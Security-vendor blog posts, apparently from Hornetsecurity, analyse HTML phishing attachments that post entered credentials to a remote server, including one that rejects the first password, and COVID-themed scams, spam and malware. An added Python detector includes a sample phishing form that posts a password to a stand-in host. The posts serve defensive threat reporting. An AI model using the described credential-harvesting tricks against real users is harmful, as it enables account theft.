When the user opens the attachment, a form asks for the user’s credentials or in this case a whole array of private and confidential information:



The document is even helpful enough to check (locally via HTML5 features) whether the information the user has entered has a valid format, e.g., the email contains an @ symbol, etc.:



Once the user’s input has been locally validated, an HTTP POST request is issued sending the entered information to a remote server:



This scheme is a great way to prevent your phishing website from being blacklisted, as there is no visible phishing webpage online that a hosting provider could take down. Getting a website banned because it receives HTTP POST requests is a hard one to convey to a hosting provider or owner of a compromised website.

Recently the Security Lab found an interesting new twist to this scheme in a long-running series of such HTML phishing attachments pretending to be from one of the major integrated container logistics and supply chain companies.



The phishing activity that this interesting scheme is part of has been going on uninterrupted for months – and in a different form likely for years:




The fact that more emails are sent during business days would indicate that this activity is targeting businesses:



Even though the language of the phishing emails is exclusively English, the emails are sent predominantly to German, US and UK companies:



Granted the country distribution is slightly biased by Hornetsecurity’s client base since Hornetsecurity is a market leader in the DACH region.

As an interesting note, the networks from which these emails are sent are as follows:



With the owners of the 7 AS with the highest volume of sent emails being:

Volume  ASN     ASN owner
5450    199653  ARUBAFR-AS, FR
3300    266772  TRIMOTION S.R.L., AR
1450    8374    PLUSNET Plus network operator in Poland, PL
1375    15704   XTRA TELECOM S.A., ES
1275    54290   HOSTWINDS, US
1225    1221    ASN-TELSTRA Telstra Corporation Ltd, AU


Asking the user twice

While most of the observed phishing documents follow the scheme previously outlined – except for asking the user only for a password and having the user’s email address already pre-filled in the document – a few other phishing documents in this series, however, come with a twist.

When opening the phishing document the user is asked to input the password to preview some shipping documents:



Regardless of what password is entered, the user is immediately presented with another password popup form claiming that the password that was entered is incorrect:



This is probably done in an attempt to prevent clever users from first trying with a made-up password – in case it is phishing – and only entering their real password when a fake password won’t get them in.

But only that last entered password is sent to the remote server:



Last but not least, the user is redirected to the image hosting service Imgur and presented with an image of shipping documents:



Obviously, those pictured documents are as fake as the phishing email itself.


Conclusion and Remediation

This example shows that the trick proposed by some users to protect against phishing, i.e., always entering a false password first and entering the correct password only after the false one was rejected, does not work. The logic behind this trick seems to be that most phishing forms will accept any password. So if a system rejects a wrong password it must be legit; how else would it know that the password is wrong? But as this case has shown, a phishing form can simply reject your password, too. In fact, it could reject all passwords and send all attempts to the attacker in hopes that the victim will hand over all passwords while trying to log into the fake password form.

Remediation is not so simple. Because the phishing webpage is loaded locally into the victim’s browser, blacklists such as Google’s Safe Browsing will not warn the user that a phishing webpage is opened. Another thing is the exfiltration mechanism. The single HTTP POST request is sent to a likely compromised WordPress website, making it hard to discover in a busy network and, because there is no visible phishing website online, also hard to investigate for a network analyst.

The safest way to protect against these HTML phishing webpage attachments is to not allow them into the user’s mailbox in the first place. For example, the precise analysis mechanisms of Hornetsecurity’s Spam and Malware Protection detect such emails in the first filter instances and block these phishing emails before they can be delivered to a mailbox.
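A minimal static check of the kind a mail filter could run on HTML attachments like the ones described above, as an added example (not Hornetsecurity's detection logic). It assumes the simple case in which the form's action attribute names the remote server; the class, function, host name and sample markup are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormAudit(HTMLParser):
    """Collects every <form> and counts password inputs inside or outside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.orphan_password_inputs = 0
        self._open_form = None

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._open_form = {"action": attrs.get("action", ""), "passwords": 0}
            self.forms.append(self._open_form)
        elif tag == "input" and attrs.get("type", "").lower() == "password":
            if self._open_form is None:
                self.orphan_password_inputs += 1
            else:
                self._open_form["passwords"] += 1

    def handle_endtag(self, tag):
        if tag == "form":
            self._open_form = None


def audit_html_attachment(html):
    """Return findings for an HTML attachment that is meant to be opened locally."""
    parser = FormAudit()
    parser.feed(html)
    parser.close()
    findings = []
    for form in parser.forms:
        target = urlparse(form["action"].strip())
        # Opened from disk, the page has no web origin of its own, so any
        # absolute http(s) action sends the credentials to a third-party server.
        if form["passwords"] and target.scheme in ("http", "https") and target.hostname:
            findings.append("password form posts to " + target.hostname)
    if parser.orphan_password_inputs:
        findings.append("password input outside a form (submission is script-driven)")
    return findings


# Constructed samples, not taken from the observed phishing attachments.
PHISH = ('<form method="post" action="https://collector.example/submit">'
         '<input type="email" name="user" value="user@example.org" required>'
         '<input type="password" name="pass" required></form>')
SCRIPTED = '<div><input type="password" id="pw"><button>View</button></div>'
BENIGN = '<form action="#results"><input type="text" name="q"></form>'
```

A finding is a reason to quarantine or inspect the attachment, not proof of phishing; the second finding covers attachments whose submission is handled by script rather than by a form action.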



Corona Opportunists: How bad actors leverage the crisis


In times of crisis there are always opportunists who try to take advantage of the situation. This is no different with the current Coronavirus COVID19 pandemic: the experts from Hornetsecurity are observing more and more such campaigns developing. Currently, the percentage of malicious emails referencing Corona is skyrocketing.

In the following, we will therefore describe how the current crisis situation is increasingly serving hackers as a hook for fraudulent attempts, as well as for the spread of spam and malware.



Compared to the total amount of emails classified as malicious by Hornetsecurity, the amount of emails with the topic Coronavirus is still small, but increasing.

To give readers an insight into how cyber-criminals are exploiting the Coronavirus COVID19 crisis with various activities, the Security Lab would like to present some of their daily observations.



We will take a look at three activities:

– Scams
– Spam
– Malware


Sextortion Blackmailers Pivot to COVID19 Scams

First, we look at scams. A long-running evergreen is the sextortion scam. In these sextortion scams, a victim receives an email claiming their computer has been compromised and a video was recorded while they were browsing a pornographic website. In order to prevent this video from being shared with the victim’s friends and family, the victim should transfer cryptocurrency (usually Bitcoin) to a specific Bitcoin Address.
Obviously, the victim’s computer has not been compromised and no video was taken.

One activity group that the Security Lab has previously observed being involved in such sextortion scams has pivoted to impersonating the WHO and asking the victims for donations because of the coronavirus.

These scam emails can be seen below:



Another such activity has recently started straight up asking for Bitcoins simply for being infected and staying at home and thus protecting the victim’s home by not spreading the virus:



In the following timeline the increase in activity can be seen – the WHO scam uses the Bitcoin Addresses 16gmYrbqMr4SZeA7SqNVmirhnhDG3maYPK and 13Rfk6FXkqswaYnqMys5BkiDvJbwVdL8TD (colors blue and red) while the scam straight up asking for BTC uses 18P3S6DuNUpW2WLozsrrW6rRd6xh24Rc7N (colored in green):



Other activity groups, however, have not yet jumped onto the coronavirus bandwagon. Hence, the classic sextortion scams are also still in use.


Spam for N95/FFP3 Masks

Next, we take a look at the spammers. These groups usually try to sell the recipient products or services, or try to generate traffic for websites (illicit SEO) or spike interest in stock (market manipulation).

Here it is clear which products related to the corona crisis spammers are likely to spam – masks. Lots of them:

The timeline of these activities shows that not only the diversity in different masks being advertised, but also the overall volume of these spam emails, is increasing:



Malware mass distribution

Last but not least, activities distributing malware have also been observed pivoting to corona related lure emails. To this end, we present insights into one threat activity group that has been observed distributing Formbook [1], Loki Bot [2], Agent Tesla [3] and AZORult [4] malware inside of various archives (ZIP, RAR, ACE, ISO, GZ, …) attached to emails.

While the Security Lab has continuously tracked this activity, on 17 March 2020 some emails belonging to this activity group started using either “corona” or “Covid-19” in either the subject or attachment names. This trend keeps on increasing, as can be seen from the following timeline, which displays emails by this activity group without a corona theme in green and emails with a corona theme in red:



Conclusion and Remediation

In general, the risk to the economy from these threat activities is the same as before the crisis. Cyber-criminals continue to use the same schemes and mechanisms.

However, it is highly probable that potential victims are more likely to fall for the fraudulent practices in view of the current events. Another aspect that should not be neglected is that emails that address sensitive topics in times of crisis also address the psyche of the recipients and may even put a strain on them.

A good email filtering system should prevent these emails from reaching end users’ mailboxes – regardless of whether they contain a reference to Corona or not.

Hornetsecurity’s Spam and Malware Protection offers the highest detection rates on the market with a guaranteed 99.9% spam detection and 99.99% virus detection. This means that even opportunists who want to exploit the Corona crisis have no chance of sneaking into end users’ mailboxes and causing damage.